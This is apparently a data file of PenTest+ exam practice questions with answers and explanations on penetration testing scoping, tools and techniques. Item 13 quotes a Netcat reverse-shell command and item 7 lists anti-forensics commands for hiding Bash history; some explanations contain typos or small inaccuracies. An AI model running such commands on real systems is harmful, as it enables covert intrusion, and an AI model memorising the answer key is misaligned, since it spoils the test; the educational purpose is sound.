export const QUESTIONS = [
  {
    "id": 1,
    "question": "Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?",
    "choice_a": "SQL injection",
    "choice_b": "VM escape",
    "choice_c": "Buffer overflow",
    "choice_d": "Cross-site scripting",
    "correct_answer": "B",
    "explanation": "Web applications commonly experience SQL injection, buffer overflow, and cross-site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You\u2019ll learn more about all of these vulnerabilities in Chapters 5 and 9.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      259,
      226,
      219,
      11,
      257
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 2,
    "question": "What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?",
    "choice_a": "An SOW",
    "choice_b": "An NDA",
    "choice_c": "An MSA",
    "choice_d": "A noncompete",
    "correct_answer": "B",
    "explanation": "A nondisclosure agreement (NDA) is a legal agreement that is designed to protect the confidentiality of the client\u2019s data and other information that the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement, an MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work), and noncompetes are just that\u2014an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.",
    "topic_id": 1,
    "practice_test_id": 2,
    "related_articles": [
      31,
      37,
      18,
      36,
      40
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 3,
    "question": "Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?",
    "choice_a": "ZAP",
    "choice_b": "Nessus",
    "choice_c": "SonarQube",
    "choice_d": "OllyDbg",
    "correct_answer": "A",
    "explanation": "The Zed Attack Proxy (ZAP) from the Open Worldwide Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. Nessus is a vulnerability scanner thatSonarQube is a static, not dynamic, software testing tool, and OllyDbg is a debugger.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      226,
      11,
      3,
      253,
      332
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 4,
    "question": "Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named <code>password.sh</code>. What language is this script most likely written in?",
    "choice_a": "PowerShell",
    "choice_b": "Bash",
    "choice_c": "Ruby",
    "choice_d": "Python",
    "correct_answer": "B",
    "explanation": "The <code>.sh</code> file extension is commonly used for Bash scripts. PowerShell scripts usually have a <code>.ps1</code> extension. Ruby scripts use the <code>.rb</code> extension, and Python scripts end with <code>.py</code>.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      309,
      308,
      310,
      311,
      319
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 5,
    "question": "Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?",
    "choice_a": "Record the details in the penetration testing report.",
    "choice_b": "Remediate the vulnerability that allowed her to gain access.",
    "choice_c": "Report the potential compromise to the client.",
    "choice_d": "No further action is necessary because Renee\u2019s scope of work is limited to penetration testing.",
    "correct_answer": "C",
    "explanation": "When penetration testers discover indicators of an ongoing or past compromise, they should immediately inform management and recommend that the organization activate its cybersecurity incident response process.",
    "topic_id": 1,
    "practice_test_id": 2,
    "related_articles": [
      290,
      38,
      5,
      4,
      291
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 6,
    "question": "Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?",
    "choice_a": "Unknown environment",
    "choice_b": "Authenticated",
    "choice_c": "Internal view",
    "choice_d": "External view",
    "correct_answer": "B",
    "explanation": "An authenticated, or credentialed, scan provides the most detailed view of the system. Unknown environment assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.",
    "topic_id": 3,
    "practice_test_id": 2,
    "related_articles": [
      79,
      104,
      103,
      13,
      80
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 7,
    "question": "Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?",
    "choice_a": "<code>history -c</code>",
    "choice_b": "<code>kill -9 $$</code>",
    "choice_c": "<code>echo \"\" > /~/.bash_history</code>",
    "choice_d": "<code>ln /dev/null ~/.bash_history -sf</code>",
    "correct_answer": "D",
    "explanation": "Although all of these commands are useful for covering her tracks, only linking <code>/dev/null</code> to <code>.bash_history</code> will prevent the Bash history file from containing anything. Chapters 6 and 10 cover compromising hosts and hiding your tracks.",
    "topic_id": 5,
    "practice_test_id": 2,
    "related_articles": [
      122,
      154,
      12,
      306,
      155
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 8,
    "question": "Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?",
    "choice_a": "Nmap",
    "choice_b": "Nikto",
    "choice_c": "Wireshark",
    "choice_d": "CeWL",
    "correct_answer": "B",
    "explanation": "It\u2019s very important to know the use and purpose of various penetration testing tools when taking the PenTest+ exam. Nikto is the best tool to meet Kaiden\u2019s needs in this scenario, since it is a dedicated web application scanning tool. Nmap is a port scanner, and Wireshark is a packet analysis tool. The Custom Wordlist Generator (CeWL) is used to spider websites for keywords. None of the latter three tools perform web application security testing.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      11,
      226,
      156,
      332,
      286
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 9,
    "question": "Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?",
    "choice_a": "OSINT",
    "choice_b": "HSI",
    "choice_c": "Background",
    "choice_d": "None of the above",
    "correct_answer": "A",
    "explanation": "OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test. Chapter 3 covers OSINT in more detail.",
    "topic_id": 2,
    "practice_test_id": 2,
    "related_articles": [
      54,
      53,
      56,
      58,
      59
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 10,
    "question": "Which of the following activities constitutes a violation of integrity?",
    "choice_a": "Systems were taken offline, resulting in a loss of business income.",
    "choice_b": "Sensitive or proprietary information was changed or deleted.",
    "choice_c": "Protected information was accessed or exfiltrated.",
    "choice_d": "Sensitive personally identifiable information was accessed or exfiltrated.",
    "correct_answer": "B",
    "explanation": "Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach. You will learn more about three goals of security\u2014confidentiality, integrity, and availability\u2014in Chapter 1.",
    "topic_id": 1,
    "practice_test_id": 2,
    "related_articles": [
      1,
      292,
      296,
      4,
      301
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 11,
    "question": "Ted wants to scan a remote system using Nmap and uses the following command:<br>nmap 149.89.80.0/24 <br>How many TCP ports will he scan?",
    "choice_a": "256",
    "choice_b": "1,000",
    "choice_c": "1,024",
    "choice_d": "65,535",
    "correct_answer": "B",
    "explanation": "By default, Nmap will scan the 1,000 most common ports for both TCP and UDP. Chapter 3 covers Nmap and port scanning, including details of what Nmap does by default and how.",
    "topic_id": 2,
    "practice_test_id": 2,
    "related_articles": [
      65,
      16,
      10,
      53,
      73
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 12,
    "question": "Brian is conducting a thorough technical review of his organization\u2019s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?",
    "choice_a": "Penetration testing",
    "choice_b": "Vulnerability scanning",
    "choice_c": "Remediation",
    "choice_d": "Threat hunting",
    "correct_answer": "D",
    "explanation": "Threat hunting uses the attacker mindset to search the organization\u2019s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian\u2019s activity clearly fits this definition.",
    "topic_id": 3,
    "practice_test_id": 2,
    "related_articles": [
      199,
      94,
      270,
      288,
      189
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 13,
    "question": "Liam executes the following command on a compromised system:<br>nc 10.1.10.1 7337 -e /bin/sh <br>What has he done?",
    "choice_a": "Started a reverse shell using Netcat",
    "choice_b": "Captured traffic on the Ethernet port to the console via Netcat",
    "choice_c": "Set up a bind shell using Netcat",
    "choice_d": "None of the above",
    "correct_answer": "A",
    "explanation": "Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell. Chapters 6 and 10 provide information about setting up remote access once you have compromised a system.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      250,
      251,
      254,
      329,
      308
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 14,
    "question": "Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?<br>Insert Graphic[823810_FMuf001]",
    "choice_a": "A double jump",
    "choice_b": "A powerhop",
    "choice_c": "Double tagging",
    "choice_d": "VLAN squeezing",
    "correct_answer": "C",
    "explanation": "This is an example of a double-tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet. Double jumps may help video gamers, but the other two answers were made up for this question. Chapter 7 digs into network vulnerabilities and exploits.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      158,
      11,
      162,
      3,
      156
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 15,
    "question": "Alaina wants to conduct an on-path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?",
    "choice_a": "ARP spoofing",
    "choice_b": "IP proofing",
    "choice_c": "DHCP pirating",
    "choice_d": "Spoofmastering",
    "correct_answer": "A",
    "explanation": "ARP spoofing attacks rely on responding to a system\u2019s ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker\u2019s system can then conduct an on-path attack. Chapter 7 explores on-path attacks, methods, and uses.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      159,
      187,
      188,
      11,
      200
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 16,
    "question": "Michael\u2019s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?",
    "choice_a": "Authority",
    "choice_b": "Scarcity",
    "choice_c": "Likeness",
    "choice_d": "Social proof",
    "correct_answer": "D",
    "explanation": "Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester. Chapter 8 covers social engineering and how to exploit human behaviors.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      194,
      196,
      11,
      198,
      200
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 17,
    "question": "Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on-site via the network?",
    "choice_a": "Shoulder surfing",
    "choice_b": "Kerberoasting",
    "choice_c": "USB key drop",
    "choice_d": "Quid pro quo",
    "correct_answer": "C",
    "explanation": "A USB key drop is a form of physical honeypot that can be used to tempt employees at a target organization into picking up and accessing USB drives that are distributed to places they are likely to be found. Typically one or more files will be placed on the drive that are tempting but conceal penetration testing tools that will install Trojans or remote access tools once accessed. Chapter 8 also covers physical security attacks, including techniques like key drops.",
    "topic_id": 3,
    "practice_test_id": 2,
    "related_articles": [
      189,
      192,
      193,
      285,
      94
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 18,
    "question": "Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?<br>-rwsr-xr\u20141 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture",
    "choice_a": "An encrypted file",
    "choice_b": "A hashed file",
    "choice_c": "A SUID file",
    "choice_d": "A SIP file",
    "correct_answer": "C",
    "explanation": "The <code>s</code> in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner. Chapter 10 discusses vulnerabilities in Linux, including how to leverage vulnerable SUID files.",
    "topic_id": 4,
    "practice_test_id": 2,
    "related_articles": [
      235,
      309,
      217,
      3,
      254
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 19,
    "question": "Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?",
    "choice_a": "Nmap",
    "choice_b": "Traceroute",
    "choice_c": "regmon",
    "choice_d": "Whois",
    "correct_answer": "D",
    "explanation": "Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois. Nmap is a useful port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry tool that has been supplanted by Process Monitor. You\u2019ll read more about OSINT in Chapter 3.",
    "topic_id": 2,
    "practice_test_id": 2,
    "related_articles": [
      57,
      54,
      10,
      68,
      53
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 20,
    "question": "Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?",
    "choice_a": "Run <code>system-detect-virt</code>.",
    "choice_b": "Run <code>ls -l /dev/disk/by-id</code>.",
    "choice_c": "Run <code>wmic</code> baseboard to get manufacturer, product.",
    "choice_d": "Run <code>dmidecode</code> to retrieve hardware information.",
    "correct_answer": "C",
    "explanation": "All of these commands are useful ways to determine if a system is virtualized, but <code>wmic</code> is a Windows tool.",
    "topic_id": 2,
    "practice_test_id": 2,
    "related_articles": [
      16,
      327,
      312,
      65,
      67
    ],
    "source": "285006_Assessment Test"
  },
  {
    "id": 21,
    "question": "What term describes a document created to define project-specific activities, deliverables, and timelines based on an existing contract?",
    "choice_a": "NDA",
    "choice_b": "MSA",
    "choice_c": "SOW",
    "choice_d": "MOD",
    "correct_answer": "C",
    "explanation": "A statement of work covers the working agreement between two parties and is used in addition to an existing contract or master services agreement (MSA). An NDA is a nondisclosure agreement, and the acronym MOD was made up for this question.",
    "topic_id": 1,
    "practice_test_id": 6,
    "related_articles": [
      31,
      37,
      17,
      30,
      18
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 22,
    "question": "Maria wants to build a penetration testing process for her organization and intends to start with an existing standard or methodology. Which of the following is not suitable for that purpose?",
    "choice_a": "ISSAF",
    "choice_b": "OSSTM",
    "choice_c": "PTES",
    "choice_d": "ATT&CK",
    "correct_answer": "D",
    "explanation": "PTES, OSSTMM, and ISSAF are all penetration testing methodologies or standards. MITRE\u2019s ATT&CK framework describes adversary tactics and techniques but does not outline how to perform a penetration test.",
    "topic_id": 1,
    "practice_test_id": 1,
    "related_articles": [
      46,
      47,
      49,
      50,
      14
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 23,
    "question": "Which of the following types of penetration test would provide testers with complete visibility into the configuration of a web server without having to compromise the server to gain that information?",
    "choice_a": "Unknown environment",
    "choice_b": "Partial knowledge",
    "choice_c": "Known environment",
    "choice_d": "Zero knowledge",
    "correct_answer": "C",
    "explanation": "Known environment testing, often also known as crystal box or white-box testing, provides complete access and visibility. Unknown environment, or black-box testing, provides no information, whereas partial knowledge, or gray-box testing, provides limited information.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      24,
      22,
      21,
      23,
      29
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 24,
    "question": "What type of legal agreement typically covers sensitive data and information that a penetration tester may encounter while performing an assessment?",
    "choice_a": "A noncompete",
    "choice_b": "An NDA",
    "choice_c": "A data security agreement",
    "choice_d": "A DSA",
    "correct_answer": "B",
    "explanation": "A nondisclosure agreement (NDA) covers the data and other information that a penetration tester may encounter or discover during their work. It acts as a legal agreement preventing disclosure of that information.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      31,
      37,
      36,
      18,
      38
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 25,
    "question": "During a penetration test scoping discussion, Charles is asked to test the organization\u2019s SaaS-based email system. What concern should he bring up?",
    "choice_a": "Cloud-based systems require more time and effort.",
    "choice_b": "Determining the scope will be difficult due to the size of cloud-hosted environments.",
    "choice_c": "Cloud service providers do not typically allow testing of their services.",
    "choice_d": "Testing cloud services is illegal.",
    "correct_answer": "C",
    "explanation": "Cloud service providers don\u2019t typically allow testing to be conducted against their services. Charles may recommend that the company ask for third-party security audit information instead. Cloud systems and large environments can be difficult to scope and may require more time, but the primary issue here is the ability to even legitimately conduct the assessment that is being requested.",
    "topic_id": 1,
    "practice_test_id": 7,
    "related_articles": [
      35,
      31,
      37,
      33,
      30
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 26,
    "question": "During a penetration test, Alex discovers that he is unable to scan a server that he was able to successfully scan earlier in the day from the same IP address. What has most likely happened?",
    "choice_a": "His IP address was whitelisted.",
    "choice_b": "The server crashed.",
    "choice_c": "The network is down.",
    "choice_d": "His IP address was blacklisted.",
    "correct_answer": "D",
    "explanation": "The IP address or network that Alex is sending his traffic from was most likely blacklisted as part of the target organization\u2019s defensive practices. A whitelist would allow him in, and it is far less likely that the server or network has gone down.",
    "topic_id": 1,
    "practice_test_id": 3,
    "related_articles": [
      22,
      18,
      36,
      19,
      37
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 27,
    "question": "What does an MSA typically include?",
    "choice_a": "The terms that will govern future agreements",
    "choice_b": "Mutual support during assessments",
    "choice_c": "Microservices architecture",
    "choice_d": "The minimum service level acceptable",
    "correct_answer": "A",
    "explanation": "A master service agreement (MSA) is a contract that defines the terms under which future work will be completed. Specific work is then typically handled under a statement of work (SOW).",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      31,
      37,
      18,
      26,
      38
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 28,
    "question": "While performing an on-site penetration test, Cassandra plugs her laptop into an accessible network jack. When she attempts to connect, however, she does not receive an IP address and gets no network connectivity. She knows that the port was working previously. What technology has her target most likely deployed?",
    "choice_a": "Jack whitelisting",
    "choice_b": "Jack blacklisting",
    "choice_c": "NAC",
    "choice_d": "802.15",
    "correct_answer": "C",
    "explanation": "The organization that Cassandra is testing has likely deployed network access control (NAC). Her system will not have the proper NAC client installed, and she will be unable to access that network jack without authenticating and having her system approved by the NAC system.",
    "topic_id": 1,
    "practice_test_id": 1,
    "related_articles": [
      22,
      19,
      29,
      45,
      17
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 29,
    "question": "What type of penetration test is not aimed at identifying as many vulnerabilities as possible and instead focuses on vulnerabilities that specifically align with the goals of gaining control of specific systems or data?",
    "choice_a": "An objectives-based assessment",
    "choice_b": "A compliance-based assessment",
    "choice_c": "A black-team assessment",
    "choice_d": "A red-team assessment",
    "correct_answer": "A",
    "explanation": "An objectives-based assessment specifically targets goals like gaining access to specific systems or data. A compliance-based assessment is conducted as part of compliance efforts and will focus on whether systems are properly secured or meet standards. A red-team assessment is intended to simulate an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find. Black-team assessments are not a commonly used penetration testing term.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      23,
      14,
      52,
      299,
      37
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 30,
    "question": "During an on-site penetration test, what scoping element is critical for wireless assessments when working in shared buildings?",
    "choice_a": "Encryption type",
    "choice_b": "Wireless frequency",
    "choice_c": "SSIDs",
    "choice_d": "Preshared keys",
    "correct_answer": "C",
    "explanation": "Knowing the SSIDs that are in scope is critical when working in shared buildings. Penetrating the wrong network could cause legal or even criminal repercussions for a careless penetration tester!",
    "topic_id": 1,
    "practice_test_id": 3,
    "related_articles": [
      19,
      17,
      36,
      18,
      40
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 31,
    "question": "Ruchika has been asked to conduct a penetration test against internal business systems at a mid-sized company that operates only during a normal day shift. The test will be run against critical business systems. What restriction is most likely to be appropriate for the testing?",
    "choice_a": "Time of day",
    "choice_b": "Types of allowed tests",
    "choice_c": "Types of prohibited tests",
    "choice_d": "The physical locations that can be tested",
    "correct_answer": "A",
    "explanation": "Time-of-day restrictions can be used to ensure tests occur when the systems are not in use, allowing time for recovery or restoration if something goes wrong. Types of allowed tests or denied tests are less likely to be used since they can limit the value of a test, and restricting physical locations is uncommon for smaller organizations that don\u2019t have many distinct locations.",
    "topic_id": 1,
    "practice_test_id": 6,
    "related_articles": [
      30,
      299,
      37,
      21,
      9
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 32,
    "question": "During a penetration test specifically scoped to a single web application, Christine discovers that the web server also contains a list of passwords to other servers at the target location. After she notifies the client, they ask her to use them to validate those servers, and she proceeds to test those passwords against the other servers. What has occurred?",
    "choice_a": "Malfeasance",
    "choice_b": "Known environment testing",
    "choice_c": "Scope creep",
    "choice_d": "Target contraction",
    "correct_answer": "C",
    "explanation": "Scope creep occurs when additional items are added to the scope of an assessment. Christine has gone beyond the scope of the initial assessment agreement. This can be expensive for clients or may cost Christine income if the additional time and effort is not accounted for in an addendum to his existing contract.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      20,
      17,
      31,
      18,
      291
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 33,
    "question": "Lucas has been hired to conduct a penetration test of an organization that processes credit cards. His work will follow the recommendations of the PCI DSS. What type of assessment is Lucas conducting?",
    "choice_a": "An objectives-based assessment",
    "choice_b": "A red-team assessment",
    "choice_c": "A black-team assessment",
    "choice_d": "A compliance-based assessment",
    "correct_answer": "D",
    "explanation": "The PCI DSS standard is an industry standard for compliance for credit card processing organizations. Thus, Lucas is conducting a compliance-based assessment.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      23,
      6,
      41,
      45,
      44
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 34,
    "question": "The penetration testing agreement document that Greg asks his clients to sign includes a statement that the assessment is valid only at the point in time at which it occurs. Why does he include this language?",
    "choice_a": "His testing may create changes.",
    "choice_b": "The environment is unlikely to be the same in the future.",
    "choice_c": "Attackers may use the same flaws to change the environment.",
    "choice_d": "The test will not be fully comprehensive.",
    "correct_answer": "B",
    "explanation": "Assessments are valid only when they occur. Systems change due to patches, user changes, and configuration changes on a constant basis. Greg\u2019s point-in-time validity statement is a key element in penetration testing engagement contracts.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      9,
      37,
      31,
      17,
      38
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 35,
    "question": "The company that Ian is performing a penetration test for uses a wired network for their secure systems and does not connect it to their wireless network. What environmental consideration should Ian note if he is conducting a partial knowledge penetration test?",
    "choice_a": "He needs to know the IP ranges in use for the secure network.",
    "choice_b": "He needs to know the SSIDs of any wireless networks.",
    "choice_c": "Physical access to the network may be required.",
    "choice_d": "Physical access to a nearby building may be required.",
    "correct_answer": "C",
    "explanation": "Access to a wired network can require physical access, which could be provided as part of a partial knowledge penetration test. In an unknown environment test, Ian might have to identify a way to compromise a system connected to the network remotely or to gain physical access to the building where the systems are. Knowing the IP ranges or the SSIDs of wireless networks is not required for this type of test. IP ranges can be determined once he is connected, and the test specifically notes that wired networks are not connected.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      24,
      17,
      19,
      22,
      292
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 36,
    "question": "Megan wants to gather data from a service that provides data to an application. What type of documentation should she look for from the application\u2019s vendor?",
    "choice_a": "Database credentials",
    "choice_b": "System passwords",
    "choice_c": "API documentation",
    "choice_d": "Network configuration settings",
    "correct_answer": "C",
    "explanation": "Megan should look for API documentation. If the application uses an API, she may be able to use default API credentials or methods to gather data. The problem does not mention a database, and system passwords and network configuration settings are not as useful here.",
    "topic_id": 1,
    "practice_test_id": 7,
    "related_articles": [
      21,
      29,
      47,
      49,
      6
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 37,
    "question": "Charles has completed the scoping exercise for his penetration test and has signed the agreement with his client. Whose signature should be expected as the counter signature?",
    "choice_a": "The information security officer",
    "choice_b": "The project sponsor",
    "choice_c": "The proper signing authority",
    "choice_d": "An administrative assistant",
    "correct_answer": "C",
    "explanation": "While the ISO or the sponsor may be the proper signing authority, it is important that Charles verify that the person who signs actually is the organization\u2019s proper signing authority. That means this person must have the authority to commit the organization to a penetration test. Unfortunately, it isn\u2019t a legal term, so Charles may have to do some homework with his project sponsor to ensure that this happens correctly.",
    "topic_id": 1,
    "practice_test_id": 5,
    "related_articles": [
      37,
      36,
      35,
      18,
      40
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 38,
    "question": "Elaine wants to ensure that the limitations of her red-team penetration test are fully explained. Which of the following are valid disclaimers for her agreement? (Choose two.)",
    "choice_a": "Risk tolerance",
    "choice_b": "Point-in-time",
    "choice_c": "Comprehensiveness",
    "choice_d": "Impact tolerance",
    "correct_answer": [
      "B",
      "C"
    ],
    "explanation": "Both the comprehensiveness of the test and the limitation that it is only relevant at the point in time it is conducted are appropriate disclaimers for Elaine to include. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.",
    "topic_id": 1,
    "practice_test_id": 6,
    "related_articles": [
      299,
      31,
      37,
      301,
      30
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 39,
    "question": "Jen wants to conduct a penetration test and includes mobile application testing. Which standard or methodology is most likely to be useful for her efforts?",
    "choice_a": "NIST",
    "choice_b": "OWASP",
    "choice_c": "KALI",
    "choice_d": "ISSAF",
    "correct_answer": "B",
    "explanation": "The Open Worldwide Application Security Project provides mobile application testing guidelines as part of their documentation, making it the best option on this list for Jen. NIST provides high-level guidance about what tests should include, KALI is a security-focused Linux distribution, and ISSAF is a dated penetration testing standard.",
    "topic_id": 1,
    "practice_test_id": 7,
    "related_articles": [
      47,
      29,
      50,
      49,
      48
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 40,
    "question": "What type of assessment most closely simulates an actual attacker\u2019s efforts?",
    "choice_a": "A red-team assessment with a zero knowledge strategy",
    "choice_b": "A goals-based assessment with a full knowledge strategy",
    "choice_c": "A red-team assessment with a full knowledge strategy",
    "choice_d": "A compliance-based assessment with a zero knowledge strategy",
    "correct_answer": "A",
    "explanation": "A red-team assessment with zero knowledge will attempt a penetration test as though they were actual attackers who do not have prior or insider knowledge of the organization. Full knowledge assessments provide more knowledge than attackers can be expected to have, and goals-based assessments target specific systems or elements of an organization rather than the broader potential attack surface that actual attackers may target.",
    "topic_id": 1,
    "practice_test_id": null,
    "related_articles": [
      23,
      24,
      25,
      14,
      8
    ],
    "source": "285006_Ch02"
  },
  {
    "id": 41,
    "question": "Megan runs the following Nmap scan:<br>nmap -sU -sT -p 1-65535 example.com <br>What information will she <i>not</i> receive?",
    "choice_a": "TCP services",
    "choice_b": "The state of the service",
    "choice_c": "UDP services",
    "choice_d": "A list of vulnerable services",
    "correct_answer": "D",
    "explanation": "This is a port scan, not a vulnerability scan, so Megan will not be able to determine if the services are vulnerable just from this scan. The Nmap scan will show the state of the ports, both TCP and UDP.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      65,
      67,
      73,
      16,
      61
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 42,
    "question": "Tom wants to find metadata about an organization using a search engine. What tool from the following list should he use?",
    "choice_a": "ExifTool",
    "choice_b": "MetaSearch",
    "choice_c": "FOCA",
    "choice_d": "Nmap",
    "correct_answer": "C",
    "explanation": "FOCA, or Fingerprinting Organizations with Collected Archives, is a useful tool for searching for metadata via search engines. ExifTool is used for individual files. MetaSearch was made up for this question, and although Nmap has many functions, it isn\u2019t used for metadata searches via search engines.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      16,
      54,
      55,
      56,
      57
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 43,
    "question": "After running an Nmap scan of a system, Zarmeena discovers that TCP ports 139, 443, and 3389 are open. What operating system is she most likely to discover running on the system?",
    "choice_a": "Windows",
    "choice_b": "Android",
    "choice_c": "Linux",
    "choice_d": "iOS",
    "correct_answer": "A",
    "explanation": "Zarmeena knows that TCP ports 139, 445, and 3389 are all commonly used for Windows services. Although those ports could be open on a Linux, Android, or iOS device, Windows is her best bet.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      66,
      65,
      67,
      10,
      73
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 44,
    "question": "Charles runs an Nmap scan using the following command:<br>nmap -sT -sV -T2 -p 1-65535 example.com <br>After watching the scan run for over two hours, he realizes that he needs to optimize the scan. Which of the following is not a useful way to speed up his scan?",
    "choice_a": "Only scan via UDP to improve speed.",
    "choice_b": "Change the scan timing to 3 or faster.",
    "choice_c": "Change to a SYN scan.",
    "choice_d": "Use the default port list.",
    "correct_answer": "A",
    "explanation": "Only scanning via UDP will miss any TCP services. Since the great majority of services in use today are provided as TCP services, this would not be a useful way to conduct the scan. Setting the scan to faster timing (3 or faster), changing from a TCP connect scan to a TCP SYN scan, or limiting the number of ports tested are all valid ways to speed up a scan. Charles needs to remain aware of what those changes can mean, since a fast scan may be detected or cause greater load on a network, and scanning fewer ports may miss some ports.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      65,
      67,
      53,
      73,
      16
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 45,
    "question": "Karen identifies TCP ports 8080 and 8443 open on a remote system during a port scan. What tool is her best option to manually validate the services running on these ports?",
    "choice_a": "SSH",
    "choice_b": "SFTP",
    "choice_c": "Telnet",
    "choice_d": "A web browser",
    "correct_answer": "D",
    "explanation": "Karen knows that many system administrators move services from their common service ports to alternate ports and that 8080 and 8443 are likely alternate HTTP (TCP 80) and HTTPS (TCP 443) server ports, and she will use a web browser to connect to those ports to check them. She could use Telnet for this testing, but it requires significantly more manual work to gain the same result, making it a poor second choice unless Karen doesn\u2019t have another option.",
